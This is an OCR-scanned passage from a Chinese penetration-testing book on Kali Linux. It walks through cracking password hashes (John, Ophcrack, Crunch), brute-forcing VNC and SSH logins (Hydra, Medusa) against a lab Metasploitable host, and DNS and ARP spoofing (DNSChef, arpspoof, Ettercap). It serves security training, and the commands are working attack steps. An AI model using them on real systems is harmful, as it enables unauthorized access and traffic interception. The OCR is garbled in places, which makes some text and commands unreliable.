Loaded 7 password hashes with 7 different salts (FreeBSD MD5 [128/128 SSE2 intrinsics 12x]) 
postgres (postgres) 
user (user) 
msfadmin (msfadmin) 
service (service) 
123456789 (klog) 
batman (sys) 
图 10.12 
7 7j AN ATA 
由 下 表 可 见 ，John 成 功 破 解 出 了 多 个 密码 。 
用 户 名 密 码 
postgres postgres 
user user 
msfadmin msfadmin 
service service 
klog 123456789 


Sys batman 


上 述 密 码 文 件 (pass 文 件 ) 包含 有 7 个 账户 密码 的 信息 ，John 成 功 
M 中 的 6 组 密码 。 它 没 能 快速 破解 出 root 的 密码 。 

如 需 清空 John 程 序 的 缓存 ， 就 要 删除 文件 /root/.john/john.pot ° 

ini deine 密码 ， 就 要 使 用 pwdump (工具 集 ) 把 SYSTEM 和 
SAM 文 件 中 的 密码 哈 希 值 (LM 和 /或 NTLM 算 法 ) 提取 出 来 。 如 需 了 解 
i^ TARY BR LB, dj 2 http://www. 
openwall.com/passwords/pwdump ° Kali Linux 收 孙 了 其 中 的 samdump2 程 
序 。 

接 下 来 ， 我 们 使 用 字典 文件 password.lst 破解 samdump2 导出 的 哈 
希 信息 。 此 时 需要 使 用 的 指令 如 下 所 示 。 

# john test-sam --wordlist=password.lst --format=nt 


上 还 指令 的 运行 J 信息 如 图 10. 13 所 示 。 


root@kali:~/pwd# john test-sam --format-nt --wordlist-password.lst 

Loaded 2 password hashes with no different wales (NT MD4 [128/128 X2 SSE2-16]) 

password01 (Administrator) 

guesses: 1 time: 0:00:00:00 DONE (Tue Aug 27 22:17:08 2013) c/s: 50.00 trying: password01 
Use the "--show" option to display all of the cracked passwords reliably 


图 10.13 
上 述 信 息 表 明 ，test-sam 文 件 中 的 管理 员 密 码 如 下 所 示 。 
password01 
然后 我 们 通过 下 述 指令 查看 破解 的 结果 〈 见 图 10.14) 。 
# john test-sam --format=nt --show 


root@kali:~/pwd# john test-sam --format-nt --show 
dministrator:password01:e52cac67419a9a22c295285c92c d86b4 :b2641aeaBeb4cO0O0ede89cd2b7c78f6fb: : : 


l password hash cracked, 1 left 


图 10.14 
上 述 信 息 表 明 : John 成 功 破 解 出 了 Windows 主机 的 管理 员 密 码 ， 
但 是 它 未 能 破解 出 常规 用 户 tedi 的 密码 。 
6. Johnny 
如 果 您 对 John 程 序 复杂 的 命令 行 指 令 望 而 却步 ， 那 么 您 可 能 会 喜 
欢 E 的 图 形 化 版 本 
(http://openwall.info/wiki/john/johnny) ° Johnny 程序 的 图 形 化 界面 非 
常 友好 ， 您 不 必 在 命令 行 里 逐一 指定 John 程 序 的 各 个 选项 。 
如 需 启 动 Johnny 程 序 ， 可 在 终端 中 使 用 下 述 指令 。 
# johnny 
上 述 指令 将 启动 Johnny 的 图 形 化 界面 。 
我 们 使 用 这 个 程序 分 析 前 一 个 例子 中 Metasploitable 2 系统 的 哈 
硕 。 其 分 析 结 果 如 图 10.15 所 示 。 


Johnny 


Johnny 一 | oO) x 


File Attack Passwords 


T A A ki 


Open Passwd File en Last Se Start Attack Resume Attack juse Attack Copy 
Fe | 一 — — — — - = 
x User Password Hash GECOS 
Passwords 1 root $1$/avpfBJ... 0:0:root:/root:/bin/bash 
~ 2 sys batman $1$fUX6BP... 3:3:sys:/dev:/bin/sh 
Options | | 3! kiog 123456789 $1$f2ZVM... 103:104::/home/klog:/bin/false 
ill 4 msfadmin msfadmin $1$XN10Zj.. 1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash 
Statistics | 5 postgres postgres $1$Rw35ik.... 108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash 
A l6 user user $1$HESu9x... 1001:1001 just a user,111,,:/ħome/user:/bin/bash 
Settings 7 service service $1$kR3ue7 1002:1002.,,,:/hnome/service:/bin/bash 
d 


Output 


85% (6/7: 6 cracked, 1 teft) [--format=md5] | 


410.15 

上 述 信 息 表明 ，Johnny 破 解 哈 希 的 能 力 和 John 程 序 相同 。 

7. Ophcrack 

Ophcrack 是 一 球 基 于 彩虹 表 的 人 破解 工具 。 它 可 破解 LM 和 NTLM 型 
的 Windows 的 密码 哈 希 。 这 款 程序 有 命令 行 版 本 ， 也 有 图 形 化 界面 的 版 
本 。 因 为 它 属 于 彩虹 表 破 解 工具 ， 所 以 Ophcrack 采 用 的 破解 策略 同样 
是 以 空间 换 时 间 的 策略 。 

Windows NT 和 早期 的 Windows 系统 (包括 2000/XP) 采用 LAN 
Manager (LM) 保存 用 户 密码 的 哈 希 。 如 需 深 入 了 解 LM 哈 希 ， 请 参阅 
http://technet.microsoft.com/en-us/library/dd277300.aspx ° 

后 来 ， 微 软 推出 了 NT LAN Manager (NTLM) 哈 希 ， 以 替代 LM 哈 
F o NTLM 算法 可 对 账号 进行 认证 ， 并 实现 了 Pu bcn 
TE « Windows NT SP4 开 始 ，Windows 系 统 开 始 逐 步 采 纳 更 为 安全 的 
NTLM v2 的 算法 。 a 能 
微软 已 经 不 再 推荐 用 户 使 用 NTLM 哈 希 ， 具 体 原 因 请 参见 


http://msdn.microsoft. com/en-us/library/cc236715.aspx ° 


有 X NTLM 和 NILM v2 By K FI , d$ $ W 
http://msdn.microsoft.com/en-us/library/cc236701.aspx ° 

如 需 在 命令 行 中 启动 Ophcrack 程 序 ， 可 在 终端 中 使 用 下 述 指令 。 

# ophcrack-cli 

上 述 指令 将 会 在 屏幕 上 显示 简单 的 使 用 说 明 及 相关 范例 。 

如 需 启 动 Ophcrack GUI， 可 在 终端 中 使 用 下 述 指令 。 

# ophcrack 

上 述 指 令 将 会 局 动 Ophcrack GUI 〈 图 形 化 界面 ) 。 

Ophcrack 需要 彩虹 表 才 能 进行 破解 哈 希 。 所 以 ， 我 们 移 要 先 从 其 
官方 网 站 (http://ophcrack.sourceforge.net/tables.php) 下 载 彩 虹 表 。 目 
前 ， 官 方 免费 提供 Windows XP 和 Vista 彩虹 表 。 对 于 字符 集 为 数字 和 英 
文大 小 写字 母 的 密码 、 且 长 度 在 10 一 14 个 字符 以 内 的 常规 密码 ， 它 的 
破解 成 功率 高 达 99% 以 上 。 

以 xp_free_small 为 例 。 下 载 它 之 后 ， 我 们 将 其 解压 缩 并 把 解压 后 的 
文件 放 进 xp_free_small 目录 。 然 后 Windows XP 的 散 列 文件 以 pwdump 
格式 保存 为 文件 test-sam ° 

接 下 来 ， 我 们 使 用 下 述 命令 破解 匈 前 获取 的 哈 希 。 

# ophcrack -d fast -t fast -f test-sam 

在 运行 期 间 ，Ophcrack 的 提示 信息 如 下 。 


Four hashes have been found in test-sam: 


Opened 4 table(s) from fast. 

Oh Om Os; Found empty password for user tedi (NT hash #1) 

Oh Om 1s; Found password D01 for 2nd LM hash #0 

Oh Om 13s; Found password PASSWOR for 1st LM hash #0in table XP 
free fast #1 at column 4489. 

Oh Om 13s; Found password password01 for user Administrator (NT 
hash £0) 


2/2: 


Oh Om 13s; search (10096); tables: total 4, done 0, using 4; pwd found 


程序 的 运行 结果 如 下 。 

Results: 

username / hash LM password NT password 
Administrator PASSWORDO1 password01 
tedi *** empty *** * empty *** 

Fy DL, Ophcrack 破解 了 相应 用 户 的 所 有 密码 。 
8. Crunch 


Crunch (http://sourceforge.net/projects/crunch-wordlist/) 是 一 款 基于 


用 户 标 准 来 创建 密码 字典 (wordlist) 的 工具 。 密 码 字典 通常 用 于 暴力 
破解 。 


如 需 局 动 Crunch 程 序 ， 可 在 终端 中 使 用 下 述 指 令 。 

# crunch 

上 述 指 令 将 会 在 屏幕 上 显示 简单 的 使 用 说 明 及 相关 范例 。 

如 果 要 创建 由 字母 组 成 的 密码 长 度 在 5 个 字符 以 内 密码 字典 ， 并 指 


定 密码 字典 的 文件 名 为 5chars.txt， 我 们 可 使 用 下 述 指令 。 


# crunch 1 5 —o 5chars.txt 


上 述 指令 的 输出 内 容 如 图 10.16 所 示 。 


Footükali:-/pwd& crunch 1 5 -o 5chars.txt 
Crunch will now generate the following amount of data: 73645520 bytes 
70 MB 


9 GB 
9 TB 
9 PB 


Crunch will now generate the following number of lines: 12356630 


68% 


00% 


图 10.16 
文件 5chars.txt 的 内 容 如 下 。 


a 


ZZZZX 

ZZZZy 

ZZZZZ 

这 个 文件 的 内 容 表 明 ， 上 壕 指 令 创 建 了 从 a 到 zzzzz 的 各 种 字符 串 ， 
并 将 其 组 织 为 密码 字典 。 

接 下 来 ， 我 们 要 创建 由 小 写字 母 和 数字 组 成 的 密码 长 度 在 4 个 字 
和 从 以 内 的 密码 字典 ， 并 指定 字典 文件 的 文件 名 为 wordlist.lst ° 

根据 以 上 需求 ， 我 们 需要 使 用 下 述 指令 。 

# crunch 1 4 -f /usr/share/crunch/charset.lst lalpha-numeric 

-o wordlist.lst 

上 述 指令 的 输出 内 容 如 下 。 

Crunch will now generate the following amount of data: 8588664 bytes 

8 MB 

0 GB 

0 TB 

0 PB 

Crunch will now generate the following number of lines: 1727604 

10096 

在 我 的 主机 上 执行 上 述 指 令 ， 耗 时 大 约 1.5 分 钟 。 密 码 字 典 
wordlist.lst 的 内 容 如 下 。 

a 

b 


C 


9997 
9998 
9999 
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的 工具 。 所 谓 在 线 破解 ， 意 味 着 这 类 工具 在 与 被 测 主机 建立 连接 之 后 
才能 破解 密码 。 

本 将 要 介绍 的 工具 可 分 为 以 下 几 类 : 

e 制作 密码 字典 ; 

e 搜索 密码 的 哈 希 值 ; 

e 在 线 密 码 破 解 工具 。 

本 节 首 先 会 讲解 两 款 根据 被 测 网 站 信息 制作 密码 字典 的 工具 ， 然 
后 会 介绍 儿 款 在 线 破解 密码 的 工具 。 

在 线 密码 破解 工具 会 采取 常规 用 户 登 录 的 方式 ， 以 用 户 名 和 和 密码 
登录 远程 主机 的 网 络 服 务 。 它 会 不 断 尝 试 各 种 用 户 名 和 密码 ， 直 到 发 
现 正确 的 账户 信息 为 止 。 

这 类 工具 存在 其 露 的 风险 。 因 为 测试 主机 会 直接 连接 到 被 测 主 
机 ， 所 以 可 能 会 被 对 方 发 现 甚 至 会 被 屏 菩 。 因 为 这 些 工具 使 用 的 是 标 
准 登 录 过 程 ， 所 以 在 破解 效率 方面 比 离线 攻击 软件 的 效率 更 高 。 

虽然 在 线 攻 击 工具 速度 不 快 ， 也 可 能 触发 帐户 锁定 机 制 ， 但 是 对 
于 SSH ` Telnet 和 FTP 这 类 服务 来 说 ， 在 线 攻击 是 密码 破解 的 唯一 方 
式 。 在 进行 在 线 的 密码 攻击 时 ， 务 必 加 倍 小 心 ; 尤其 是 在 攻击 Active 
Directory (AD) 服务 器 的 账户 时 ， 骏 力 破解 可 能 会 锁定 所 有 的 域 账 
户 。 要 避免 发 生 锁定 账户 的 情况 ， 不 仅 要 事先 查看 密码 和 用 户 锁定 策 
略 ， 在 测试 密码 时 最 好 还 要 使 用 同一 个 密码 对 所 有 用 户 名 进行 测试 
(轮换 用 户 名 ， 而 不 是 轮换 密码 ) 。 


1. CeWL 
CeWL ( Custom Word List ) 
(http://www.digininja.org/projects/cewl.php) Æ — 3X ERRINA HE 

URL 上 收集 单词 的 工具 。 把 它 收集 到 的 单词 纳入 密码 字典 ， 可 提高 密 
码 破解 工具 (例如 John the Ripper) 的 命中 率 。 

CeWL 程 序 有 很 多 选项 ， 其 中 较为 癌 用 的 如 下 所 示 。 

e --depth N 或 -4N: 提取 深度 ， 分 析 N 级 链接 以 内 的 网 页 内 容 ; 
提取 深度 的 默认 值 是 2。 

e --min word length N 或 -m N: 单词 的 最 小 长 度 ， 少 于 N 个 字符 
的 单词 不 会 被 收 孙 ; 单词 最 小 长 度 的 默认 值 是 3。 

e --verbose 或 -v: 详细 提示 模式 。 

e --write 或 -w: 设 定 输出 文件 的 文件 名 。 

如 果 在 运行 CeWL 时 遇 到 Error: zip/zip gem not installed 错 误 ， 那 么 
就 要 使 用 gem install zip/zip 指令 安装 相应 的 功能 包 : 

# gem install zip 

Fetching: zip-2.0.2.gem (10096) 

Successfully installed zip-2.0.2 

1 gem installed 

Installing ri documentation for zip-2.0.2... 

Installing RDoc documentation for zip-2.0.2... 

结合 上 述 选 项 ， 我 们 使 用 下 述 指令 从 目标 网 站 收集 单词 。 

cewl -w target.txt http://www.target.com 

稍 等 片刻 之 后 ， 程 序 会 把 收集 到 的 单词 保存 为 文件 target.txt。 在 
Kali 系 统 里 ， 这 个 文件 位 于 目录 /usr/share/cewl]。 

我 们 打开 上 述 目录 里 的 target.txt 文 件 ， 可 以 看 到 下 述 内 容 。 

Device 


dataset 


sauerlo 
Sauer 
agentChange 
ouput 
fileWrite 
oBy 
strips 
mThe 

270 
Specialforces 
Damian 
GoD 
ZERo 
zine 
Disney 
NOObz 
xThe 
Cracked 
Question 
Marc 
Doudiet 
Swiss 
Strafor 
Electric 
Alchemy 
2. Hydra 


Hydra 是 一 款 猜 测 并 破解 用 户 名 和 密码 的 工具 。 它 支持 多 种 网 络 协 
议 ， 可 破解 HTTP、FTP、POP3 和 SMB 等 协议 的 密码 。 它 会 使 用 字典 并 
行 穷 举 网 络 服务 的 用 户 名 和 密码 。 默 认 情 况 下 ， 它 向 目标 主机 发 起 16 
个 并 行 连接 同时 进行 多 组 测试 。 

如 需 启 动 Hydra 程 序 ， 可 在 终端 中 使 用 下 述 指令 。 

# hydra 

上 述 指 令 将 会 在 屏幕 上 显示 人 简单 的 使 用 说 明 。 

本 例 将 演示 使 用 hydra 程 序 破解 192.168.56.101 的 VNC 服 务 器 的 密 
码 。 如 果 密 码 字 典 的 文件 名 是 password.lst， 我 们 可 使 用 下 述 指 令 。 

# hydra -P password.lst 192.168.56.101 vnc 

上 述 指 令 的 运行 结果 将 如 图 10.17 所 示 。 

上 述 信 息 表 明 ，Hydra 成 功 地 破解 了 VNC 服务 器 的 密码 。 被 测 服 


务 右 使 用 的 密码 是 password01 和 password ° 


root@kali:~# hydra -P password.lst 192.168.56.101 vnc 
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only 


Hydra (http://www.thc.org/thc-hydra) starting at 2014-02-03 09:05:27 
[WARNING] you should set the number of parallel task to 4 for vnc services. 
[DATA] 2 tasks, 1 server, 2 login tries (l:1/p:2), -1 try per task 

[DATA] attacking service vnc on port 5900 


[5900] [vnc] host: 192.16t ] login: password: password01l 
[5900] [vnc] host: )32.168.56.1 login: password: password 
1 of 1 target successfully completed, 2 valid passwords found 


图 10.17 
下 一 步 工 作 束 是 验证 Hydra 破 解 的 密码 。 我 们 可 直接 运行 vncviewer 
程序 ， 使 用 这 些 密码 连接 到 远程 主机 的 VNC 服 务 器 。 
使 用 vncviewer 验 证 密码 的 情况 如 图 10.18 所 示 。 


root@kali:~/pwd# vncviewer 192.168.56.101 

Connected to RFB server, using protocol version 3.3 
Performing standard VNC authentication 

Password: 

Authentication successful 


D TightVNC: root's X desktop (metasploitable:O) Le 


图 10.18 
上 述 信 息 表 明 ， 破 解 的 密码 可 以 连接 到 VNC 服 务 器 ， 而 且 该 密码 
还 具有 服务 器 的 root 权 限 。 擒 到 大 便宜 了 ! 
Hydra 程 序 有 一 个 对 应 的 GUI 程 序 。 


# xhydra 
上 述 指令 将 会 启动 Hydra 的 GTK 图 形 界面 程序 。 使 用 这 个 程序 破解 
SSH 服 务 密码 的 情况 如 图 10.19 所 示 。 


Output 
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for Legal purposes only 


Hydra (http://www.thc.org/thc-hydra) starting at 2013-08-29 07:02:31 
[DATA] 3 tasks, 1 server, 3 Login tries (l:1/p:3), ~1 try per task 

[DATA] attacking service ssh on port 22 

[VERBOSE] Resolving addresses ... done 

[22][ssh] host: 192.168.56.101 login: msfadmin password: msfadmin 
1 of 1 target successfully completed, 1 valid password found 

Hydra (http://www.thc.org/thc-hydra) finished at 2013-08-29 07:02:34 


«finished» 


图 10.19 
经 验 表 明 ，xhydra 程 序 不 如 其 命令 行程 序 hydra 那 样 灵活 ， 不 能 调 
整 很 多 设置 。 例 如 ， 在 破解 VNC 服务 时 ，xhydra 无 法 设置 用 户 名 ; 更 
为 不 笠 的 是 ， 它 就 没有 设置 用 户 名 的 功能 。 
3. Medusa 


Medusa 是 另外 一 款 在 线 破 解 网 络 服务 密码 的 程序 。 它 具有 速度 
快 、 并 发 性 能 强 和 模板 化 的 特点 。 现 在 ， 它 能 够 通过 相应 模板 破解 
CVS ` FTP ` HTTP ` IMAP ` MS-SQL ` MySQL ^ NCP (NetWare) ^ 
PcAnywhere ` POP3 ^ PostgreSQL ^ rexec ^ Rlogin ^ rsh ^ SMB ` SMTP 

(VRFY) ^ SNMP ` SSHv2 ` SVN ` Telnet ^ VmAuthd ` VNC, 75 
有 一 个 通用 处 理 模板 。 

有 天 Medusa 和 Hydra 的 具体 区 别 , W MW 
http://foofus.net/goons/jmk/medusa/medusa-compare.html ° 

在 实际 的 渗透 测试 工作 中 ， 可 同时 使 用 这 两 款 工 具 、 尽 可 能 地 获 
取 被 测 主机 的 各 种 信息 。 

如 需 局 动 Medusa 工 具 ， 可 在 终端 中 使 用 下 述 指令 。 

# medusa 

上 述 指 令 将 会 在 屏幕 上 显示 简单 的 使 用 说 明 。 

Medusa 程 序 有 很 多 选项 ， 其 中 常用 的 一 些 选 项 如 下 所 示 。 

o -u EX-U[FILE]: 指定 用 户 名 或 用 户 名 字典 。 

e -h 或 -HIFILE]: 指定 主机 名 或 主机 各 字典 。 

o -p 或 -P[FILE]， 指 定 密码 或 密码 字典 。 

e-M: 配置 测试 所 用 的 模板 的 名 称 。 亦 可 通过 -d 选项 搜索 模板 。 

e-O: 设置 输出 文件 的 文件 名 。 

e-V: 设置 提示 信息 的 详细 程度 。 如 果 使 用 了 -v 4 选项 ， 将 只 能 看 
到 成 功 破解 的 登录 和 凭据。 

前 面 ， 我 们 用 Hydra 破 解 了 VNC 服 务 器 的 密码 ， 现 在 我 们 再 用 
Medusa 作 一 次 相同 的 破解 试 答 。 

# medusa -u root -P password.lst -h 192.168.56.101 -M vnc -v 4 

上 述 指令 的 运行 结 采 如 下 。 
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks 


<jmk@foofus.net> 


ACCOUNT FOUND: [vnc] Host: 192.168.56.101 User: root Password: 

password [SUCCESS] 

Medusa 只 找到 了 一 个 VNC 密 码 ， 相 比 之 下 ，Hydra 能 够 找到 了 两 个 
VNC 密 码 。 


10.3 网 络 欺 骗 工具 


前 面 介 绍 了 多 款 破 解密 码 的 工具 。 本 广 将 探索 通过 网 络 欺骗 的 手 
段 提升 权限 的 各 种 方法 。 

网 络 欺 骗 (network spoofing) 泛 指 修改 网 络 数据 的 各 种 手段 。 例 
如 ， 伪 造 MAC 地 址 、 伪 造 耻 地 址 等 的 数据 ， 都 属于 网 络 其 骗 的 范畴 。 
网 络 欺骗 旧 在 于 获取 网 络 上 两 个 会 话 主 机 的 通信 数据 。 


10.3.1 DNSChef 


DNSChef (http://thesprawl.org/projects/dnschef/) 是 一 款 DNS 代 理 
工具 。 它 可 替 DNS 服 务 需 对 被 测 主 机 进行 DNS 回复 ， 把 域名 解析 为 攻 
击 者 管控 的 卫 ， 从 而 让 攻击 者 的 主机 扮演 真 正 的 服务 圳 的 角色 。 
DNSChef 的 这 种 功能 可 用 来 分 析 甚 至 控制 客户 主机 的 网 络 流量 。 

在 使 用 DNSChef 之 前 ， 您 需要 对 被 测 主机 进行 调整 ， 指 定 
DNSChef 的 主机 为 被 测 主机 的 DNS 服务 器 。 

e 如 果 被 测 主 机 安装 的 是 Linux 系统 ， 那 么 您 应 当 修 
改 /etc/resolv.conf 文件 。 

e 如 果 被 测 主机 安装 的 是 Windows， 您 可 通过 控制 面板 的 网 络 连 
接 选 项 进行 相应 的 设置 。 

在 没有 权限 更 改 被 测 主 机 DNS 服务 器 设置 的 情况 下 ， 您 束 需 要 使 
用 其 他 手段 〈 例 如 ARP 欺 骗 并 搭设 一 个 伪 DHCP 服 务 器 等 ) 劫持 被 测 主 
机 的 DNS 请 求 。 
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192.168.2.21; 男 一 台 是 被 测 (受害 人 的 ) 主机 ， 其 IP 是 192.168.2.22。 
简便 起 见 ， 我 们 用 Metasploitable 的 虚拟 机 充当 被 测 主机 。 

首先 ， 我 们 要 对 DNSChef 进 行 设置 。 

1. 设置 为 DNS 代 理 

第 一 步 是 把 DNSChef 设 置 为 DNS 代理 服务 器 。 我 们 要 在 DNSChef 
的 主机 上 运行 下 述 指令 。 

# dnschef 

而 后 调整 这 台 主 机 的 DNS 设置 ， 使 之 使 用 本 机 (localhost) 的 DNS 
服务 器 。 

然后 使 用 下 述 命令 查询 google.com 的 DNS 记录 。 

host -t A google.com 

上 述 指 令 向 DNSChef 发 起 DNS 查询 ， 应 当 会 显示 图 10.20 所 示 的 信 
E o 

这 种 设置 将 DNSChef 调 整 为 DNS 代理 服务 器。 它 将 所 有 DNS 解析 
请 求 转发 到 上 游 解 析 服 务 器 。 本 例 中 ， 它 的 上 游 DNS 服 务 器 是 8.8.8.8。 


root@kali:~# dnschef 


| | version 0.1 | | / | 
dence. c-r 
FIGDUW.-BES T'AS. | 
[AJ IVIXACIPILLE.C] 
ios LILUGN a 


iphelix@thesprawl .org 


[*] DNS Chef started on interface: 127.0.0.1 

*] Using the following nameservers: 8.8.8.8 

[*] No parameters were specified. Running in full proxy mode 
[21:08:03] 127.0.0.1: proxying the response of type 'A' for google.com 


一 


图 10.20 
2. 伪造 域名 记录 
在 伪造 google.com 的 域名 记录 之 前 ， 先 来 看 看 google.com 的 原始 解 
析 结 果 〈 见 图 10.21) ° 


imsfadmin@metasploitable:~$ host -t ANY google.com 
google.com has address 74.125.235.41 

google.com has address 74.125.235.32 

google.com has address 74.125.235.46 

google.com has address 74.125.235.36 

google.com has address 74.125.235.39 

google.com has address 74.125.235.40 

google.com has address 74.125.235.35 

google.com has address 74.125.235.37 

google.com has address 74.125.235.38 

google.com has address 74.125.235.33 

google.com has address 74.125.235.34 

google.com name server ns2.google.com. 

google.com name server nsl.google.com. 

google.com name server ns3.google.com. 

google.com name server ns4.google.com. 

google.com has SOA record nsl.google.com. dns-admin.google.com. 1530871 7200 1800 1209600 300 
msfadminGmetasploitable:-$ 


图 10.21 

现在 ， 我 们 要 伪造 google.com 有 关 的 DNS 啊 应 。 和 前 一 个 例子 里 
的 情况 一 样 ， 首 先 要 修改 /etc/resolv.conf 文 件 ， 令 被 测 主 机 使 用 
DNSChef 作 为 其 DNS 服 务 器 。 

接 下 来 在 DNSChef 所 在 的 主机 上 使 用 下 述 指令 。 

# dnschef --fakeip=192.168.2.21 --fakedomains google.com 

--interface 192.168.2.21 -q 

而 后 我 们 在 被 测 主机 查询 google.com 的 IP 地 址 。 

$ host -t A google.com 

上 述 指令 的 运行 结 采 如 下 。 

google.com has address 192.168.2.21 

此 时 ， 运 行 DNSChef 的 主机 将 提示 图 10.22 所 示 的 信息 。 


oot@kali:~# dnschef --fakeip-192.168.2.21 --fakedomains google.com --interface 192.168.2.21 -q 
*] DNS Chef started on interface: 192.168.2.21 

*] Using the following nameservers: 8.8.8.8 

*] Cooking replies to point to 192.168.2.21 matching: google.com 

21:17:29] 192.168.2.22: cooking the response of type 'A' for google.com to 192.168.2.21 


图 10.22 
Kali 集 成 的 是 v0.1 版 本 的 DNSChef 程 序 。 这 个 版 本 不 支持 IPv6。 如 
有 果 需 要 在 IPv6 的 网 络 中 使 用 这 个 程序 ， 您 需要 将 其 升级 为 v0.2 版 
(https://thesprawl.org/media/projects/dnschef-0.2.1.tar.gz) ° 


如 需 在 IP v6 的 网 络 里 使 用 DNSChef 程 序 ， 就 要 在 指令 行 里 启用 -6 
选项 。 

此 时 ， 域 名 google.com 的 IPv6 的 真正 地 址 是 
2404:6800:4003:802::1003 ° DNSChef 主机 的 IPv6 地 址 是 
fe80::300:27ff:fe1c:5122/64 ° 

在 DNSChef 服 务 絮 中 ， 使 用 下 壕 指 令 伪 造 google.com 的 IPv6 地 址 。 

dnschef.py -6 --fakeipv6 fe80::a00:27ff:felc:5122 --interface :: -q 


10.3.2 arpspoof 


arpspoof 是 一 款 在 交换 网 络 中 辅助 进行 网 络 监听 的 实用 工具 。 前 文 
提 过 ， 在 使 用 交换 机 进行 数据 交换 的 网 络 环境 里 很 难 进行 网 络 监 听 ， 
但 arpspoof 可 以 辅助 我 们 完成 这 项 任务 。 

arpspoof 用 于 伪造 网 络 中 两 台 设备 的 ARP 通 信 。 

常规 情况 下 ， 当 主机 A 要 和 主机 B (网 关 ) 进行 通信 的 时 候 ， 主 机 
A 会 广播 ARP 请 求 以 获取 主机 B 的 MAC 地 址 。 此 后 ， 主 机 B 将 会 回应 
这 个 ARP 请 求 ， 在 ARP Reply 数据 包 里 声明 目 己 的 MAC 地 址 ; 与 此 同 
上 时， 主机 B 也 会 将 ARP 广 播 中 主机 A 的 MAC 地 址 记录 下 来 。 此 后 ， 主 机 
A 和 主机 B 才 能 开始 通信 ( 见 图 10.23) 。 

A (1) ARP Request B 
(2) ARP Reply 


(3) ARP Request 
> 
= (4) ARP Reply = 


MAC : 11.11.11.11.11.11 MAC : 22.22.22.22.22.22 


[10.23 
如 果 攻 击 者 C 想 要 监听 主机 A 和 主机 B 之 间 的 网 络 流量 ， 则 可 以 向 
主机 人 A 发送 ARP 回 复 ， 告 诉 它 主机 B 使 用 的 是 主机 C 的 MAC 地 址 


(33.33.33.33.33.33) ; 而 后 它 还 要 通告 主机 B,“ 主 机 A 的 MAC 地 址 是 
33.33.33.33.33.33" ( 见 图 10.24) ° 


A B 
= > 
MAC : ES MAC : 22. x TS 
a 
MAC : ee Fm 


图 10.24 
在 ARP 欺 骗 生效 之 后 ， 主 机 A 和 主机 B 之 间 的 所 有 网 络 数据 包 都 会 
通过 主机 C 转 发 。 
在 使 用 arpspoof 之 前 ， 需 要 在 Kali Linux (运行 ARPspoof) 的 主机 
上 启用 IP 转发 功能 。 这 就 需要 以 root 用 户 的 吴 份 执行 下 述 指令 。 
# echo 1 > /proc/sys/net/ipv4/ip_ forward 
要 通过 指令 行 界面 启动 arpspoof 程 序 ， 可 在 终端 中 执行 下 述 指 令 。 


# arpspoof 

上 述 指 令 将 会 在 屏幕 上 显示 程序 的 使 用 说 明 。 
本 例 的 试验 环境 的 具体 情况 如 下 所 示 。 

网 关 的 配置 信息 如 下 。 

e MAC 地 址 : 00-50-56-C0-00-08 


e IP 地 址 : 192.168.65.1 

e TII: 255.255.255.0 

被 测 主机 的 配置 如 下 。 

e MAC 地 址 : 00-0C-29-35-C9-CD 

e IP 地 址 : 192.168.65.129 

o TII: 255.255.255.0 

测试 主机 的 配置 如 下 。 

e MAC 地 址 : 00: 0C: 29: 09: 22: 31 

e IP 地 址 : 192.168.65.130 

e TII: 255.255.255.0 

在 启动 程序 以 前 ， 被 测 主机 的 ARP 缓 存 如 下 所 示 “。 

Interface: 192.168.65.129 --- 0x30002 
Internet Address Physical Address Type 
192.168.65.1  00-50-56-c0-00-08 dynamic 

通过 以 下 命令 ， 对 被 测 主机 实施 ARP 其 骗 。 

# arpspoof -t 192.168.65.129 192.168.65.1 

在 被 测 主 机 上 稍 等 片刻 ， 然 后 用 ping 命令 测试 网 天 的 连接 情况 。 


被 测 主机 的 ARP 缓存 很 快 就 就 会 改变 为 下 述 内 容 。 


Interface: 192.168.65.129 --- 0x30002 
Internet Address Physical Address Type 
192.168.65.1 00-0C-29-09-22-31 dynamic 
上 述 信息 表明 ， 在 被 测 主机 的 ARP 缓 存 里 ， 网 关 的 MAC 地 址 由 00- 


50-56-c0-00-08 改 变 为 00-0C-29-09-22-31。 新 的 MAC 地 址 是 测试 主机 的 
MAC 地 址 。 从 中 可 以 看 出 ， 网 关 对 应 MAC 地 址 已 经 变 成 攻击 者 机 器 的 
MAC 地 址 。 


10.3.3 Fttercap 


E he 


Ettercap (http://www.ettercap-project.org/) 是 一 款 在 LAN 中 进行 中 
间 人 攻击 的 工具 集 。 它 通过 ARP 攻 击 充 当 网 络 通信 的 中 间 人 。 一 且 
ARPUMABSGHIEA, EMREN : 

e 修改 数据 连接 ; 

e 截获 FTP、HTTP、POP 和 SSHI1 等 协议 的 密码 ; 

e 通过 伪造 SSL 证 书 的 手段 劫持 被 测 主机 的 HITPS 会 话 。 

ARP 协 议 (地 址 解析 协议 ) 用 来 把 IP 地 址 解析 为 物理 地 址 (MAC 
地 址 ) 。 当 某 个 网 络 设备 需要 与 其 他 网 络 资源 通信 时 ， 它 会 通过 ARP 
广播 查询 目标 设备 的 MAC 地 址 ， 目 标 设 备 也 会 通过 ARP 协 议 的 数据 包 
回复 自己 的 MAC 地 址 。 此 后 ， 通 信 双 方 都 会 将 耻 和 MAC 的 对 应 信息 保 
存 到 目 己 的 ARP 缓 存 中 ， 以 节省 后 续 通 信 的 查询 时 间 。 

在 某 台 主机 要 进行 通信 时 ， 它 百 移 会 查询 对 方 耳 地址 的 MAC 地 
址 。 此 时 ， 攻 击 人 员 可 将 目 己 主机 回复 给 查询 MAC 地 址 的 主机 ， 以 进 
行 中 间 人 攻击 。 这 种 攻击 叫做 ARP 毒 化 (污染 ) 攻击 和 ARP 其 骗 。 只 
有 当 攻 击 主 机 和 被 测 主机 处 于 同一 网 段 的 时 候 ， 这 种 攻击 才 会 有 效 。 

Kali Linux 提供 的 Ettercap 工具 可 以 实施 这 种 攻击 。Ettercap 有 三 种 
操作 模式 ， 文 本 模式 、 仿 图 形 (curses， 以 字符 模拟 图 形 界面 ) 模式 和 
GTK 弄 面 的 图 形 楼 式 。 

若 要 以 文本 模式 启动 Ettercap 程 序 ， 可 在 终端 中 使 用 下 述 指令 。 

# ettercap -T 

HE DEEBUHEFE, FEA wT EAD Pitta > o 

# ettercap -C 

奉 要 进入 Ettercap 的 图 形 模 式 ， 可 在 终 病 中 使 用 下 壕 指 令 。 

# ettercap -G 

